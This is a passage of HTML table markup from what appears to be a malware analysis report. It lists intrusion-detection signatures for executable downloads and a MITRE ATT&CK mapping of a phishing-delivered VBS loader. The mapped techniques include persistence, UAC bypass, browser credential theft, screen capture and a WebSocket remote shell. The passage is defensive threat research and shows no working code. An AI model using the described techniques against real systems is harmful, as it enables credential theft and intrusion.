class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tET\t\t\tMALWARE Possible Malicious Macro DL EXE (WinHTTPRequest)                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tEXE\t\t\tdownload via WinHTTP loader behavior                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t2029840                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tET\t\t\tHUNTING Request for EXE via WinHTTP M1                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tWinHTTP\t\t\tEXE request pattern                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t2022896                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tET\t\t\tHUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tEXE\t\t\tfrom suspicious TLD without Referer                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t2019822                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tET\t\t\tINFO WinHttpRequest Downloading EXE                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tConfirms\t\t\tWinHTTP EXE download                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t2019823                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tET\t\t\tEXPLOIT_KIT WinHttpRequest Downloading EXE Non-Port 80                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tEXE\t\t\tdownload on non-standard port                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t85005610                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tET\t\t\tINFO PE EXE or DLL Windows file download HTTP                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPE\t\t\tfile transfer over HTTP                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-310'>\ntable#wpdtSimpleTable-310{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-310 td, table.wpdtSimpleTable310 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h2 class=\"wp-block-heading\"><br>MITRE ATT&amp;CK Mapping<\/h2>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-311\"\n           style=\"border-collapse:collapse;\n                   border-spacing:3px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"5\"\n           data-rows=\"22\"\n           data-wpID=\"311\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:9.2307692307692%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tTechnique\t\t\tID                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:22.081447963801%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tName                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:13.665158371041%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tTactic                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"D1\"\n                    data-col-index=\"3\"\n                    data-row-index=\"0\"\n                    style=\" width:7.6923076923077%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSub-technique                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014\"\n                                            data-cell-id=\"E1\"\n                    data-col-index=\"4\"\n                    data-row-index=\"0\"\n                    style=\" width:47.330316742081%;                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tEvidence                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1566.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPhishing:\t\t\tSpearphishing Attachment                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tInitial\t\t\tAccess                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D2\"\n                    data-col-index=\"3\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E2\"\n                    data-col-index=\"4\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tJudicial\t\t\tlure .eml password-protected PDF + VBS download link                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1204.002                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tUser\t\t\tExecution: Malicious File                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tExecution                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D3\"\n                    data-col-index=\"3\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.002                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E3\"\n                    data-col-index=\"4\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tVictim\t\t\tmanually runs 0124_INTMACAO_.vbs                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1059.005                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCommand\t\t\t& Scripting: VBScript                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tExecution                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D4\"\n                    data-col-index=\"3\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.005                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E4\"\n                    data-col-index=\"4\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tWScript.exe\t\t\texecutes VBS loader                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1140                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDeobfuscate\/Decode\t\t\tFiles                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDefense\t\t\tEvasion                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D5\"\n                    data-col-index=\"3\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E5\"\n                    data-col-index=\"4\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tVBS\t\t\tBase64 obfuscation 8.4x size expansion on decode                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1027                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tObfuscated\t\t\tFiles or Information                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDefense\t\t\tEvasion                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D6\"\n                    data-col-index=\"3\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E6\"\n                    data-col-index=\"4\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tagenteV2\t\t\tDLL compiled to native code via Nuitka; mypyc aux layer                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1036.005                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tMasquerading:\t\t\tMatch Legit Name                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tDefense\t\t\tEvasion                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D7\"\n                    data-col-index=\"3\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.005                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E7\"\n                    data-col-index=\"4\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\twifi_driver.exe\t\t\t+ msedge03\/04.exe in C:\\Program Files (x86)\\Wi-fi\\                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1105                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tIngress\t\t\tTool Transfer                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC2                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D8\"\n                    data-col-index=\"3\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E8\"\n                    data-col-index=\"4\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tVBS\t\t\tdownloads container EXEs via MSXML2.ServerXMLHTTP + ADODB.Stream                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1053.005                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tScheduled\t\t\tTask\/Job                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C9\"\n                    data-col-index=\"2\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPersistence\t\t\t\/ Priv. Esc.                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D9\"\n                    data-col-index=\"3\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.005                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E9\"\n                    data-col-index=\"4\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRunAsAdmin_AutoUpdate\t\t\t+ RunAsAdmin_Executar \/sc onlogon \/rl highest                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1547.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRegistry\t\t\tRun Keys                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C10\"\n                    data-col-index=\"2\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPersistence                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D10\"\n                    data-col-index=\"3\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E10\"\n                    data-col-index=\"4\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tHKCU\\Run\\MonitorSystem\t\t\t\u2192 agenteV2_historico_detect.py                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1548.002                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tAbuse\t\t\tElevation: Bypass UAC                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C11\"\n                    data-col-index=\"2\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPrivilege\t\t\tEscalation                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D11\"\n                    data-col-index=\"3\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.002                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E11\"\n                    data-col-index=\"4\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tVBS\t\t\tre-executes with \/elevated \/fromtask                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A12\"\n                    data-col-index=\"0\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1555.003                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B12\"\n                    data-col-index=\"1\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCredentials\t\t\tfrom Browser                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C12\"\n                    data-col-index=\"2\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCredential\t\t\tAccess                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D12\"\n                    data-col-index=\"3\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.003                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E12\"\n                    data-col-index=\"4\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tSQLite\t\t\tDB cloning of Chrome\/Edge Login Data + Cookies all browser\t\t\tprofiles                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A13\"\n                    data-col-index=\"0\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1113                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B13\"\n                    data-col-index=\"1\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tScreen\t\t\tCapture                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C13\"\n                    data-col-index=\"2\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCollection                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D13\"\n                    data-col-index=\"3\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E13\"\n                    data-col-index=\"4\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tPIL\t\t\t+ mss libraries continuous JPEG frame streaming over WebSocket to\t\t\toperator                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A14\"\n                    data-col-index=\"0\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1059.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B14\"\n                    data-col-index=\"1\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tCommand\t\t\t& Scripting: PowerShell\/Shell                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C14\"\n                    data-col-index=\"2\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tExecution                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D14\"\n                    data-col-index=\"3\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t.001                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E14\"\n                    data-col-index=\"4\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tRemote\t\t\tshell via CMD:SHELL: prefix parsed from WebSocket dispatched\t\t\tthrough subprocess.Popen                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A15\"\n                    data-col-index=\"0\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tT1571                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B15\"\n                    data-col-index=\"1\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tNon-Standard\t\t\tPort                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"C15\"\n                    data-col-index=\"2\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tC2                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"D15\"\n                    data-col-index=\"3\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\t\u2014                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"E15\"\n                    data-col-index=\"4\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        \t\t\tWebSocket\t\t\tC2 (uws:\/\/) over port 8443 non-standard port for WebSocket traffic                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2\"\n                                            data-cell-id=\"A16\"\n                    